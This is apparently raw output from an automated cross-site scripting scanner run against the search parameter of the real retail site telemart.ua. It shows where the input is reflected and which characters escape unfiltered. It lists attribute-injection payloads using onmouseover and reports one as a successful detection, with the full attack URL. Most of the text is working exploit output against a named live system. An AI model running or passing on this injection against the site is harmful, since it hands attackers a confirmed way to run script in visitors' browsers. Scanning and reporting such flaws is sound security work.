https://www.telemart.ua

GET Params:[1]
['search_que']
_______________________________________________________________________________________________________
https://www.telemart.ua/search/?search_que=/uvw"xyz'yxz<zxy

----------------------------------------------------------------------------------
Attribute Context: [4]
<input type="hidden" name="page" value="https://telemart.ua/search/?search_que=/uvw"xyz'yxz<zxy">
<input type='hidden' name="page" value='https://telemart.ua/search/?search_que=/uvw&quot;xyz&#039;yxz&lt;zxy' />
<input type="hidden" name="callb_id_custom" value='https://telemart.ua/search/?search_que=/uvw&quot;xyz&#039;yxz&lt;zxy' />
<input type='hidden' name="page" value='https://telemart.ua/search/?search_que=/uvw&quot;xyz&#039;yxz&lt;zxy' />

----------------------------------------------------------------------------------
HTML Context: [2]
<title>Результаты поиска по запросу /uvw&quot;xyz'yxz&lt;zxy - Telemart</title>
<h1>/uvw&quot;xyz&#039;yxz&lt;zxy</h1>

----------------------------------------------------------------------------------
Script Context: [0]

----------------------------------------------------------------------------------
URI Context: [1]
<a href="https://telemart.ua/ua/search/?search_que=/uvw"xyz'yxz<zxy">

----------------------------------------------------------------------------------

Mitigation        "	'	<	/ 
ATTR:		False	False	False	False

Attack Payloads for ATTR
['" onmouseover="alert`1`', "' onmouseover='alert`1`"]

ATTR Attack Url: https://www.telemart.ua/search/?search_que=" onmouseover="alert`1`

 ______Detection  UnSuccessful with payload: " onmouseover="alert`1`


ATTR Attack Url: https://www.telemart.ua/search/?search_que=' onmouseover='alert`1`

=>Detection  Successful with Payload: ' onmouseover='alert`1`

FINAL OUTPUT: 
Mitigation        "	'	<	/ 
ATTR:		True	True	True	False
Mitigation        "	'	<	/ 
ATTR:		True	True	True	False
Mitigation        "	'	<	/ 
ATTR:		True	True	True	False
Mitigation        "	'	<	/ 
HTML:		True	False	True	False
Mitigation        "	'	<	/ 
HTML:		True	True	True	False
Mitigation        "	'	<	/ 
URL:		False	False	False	False
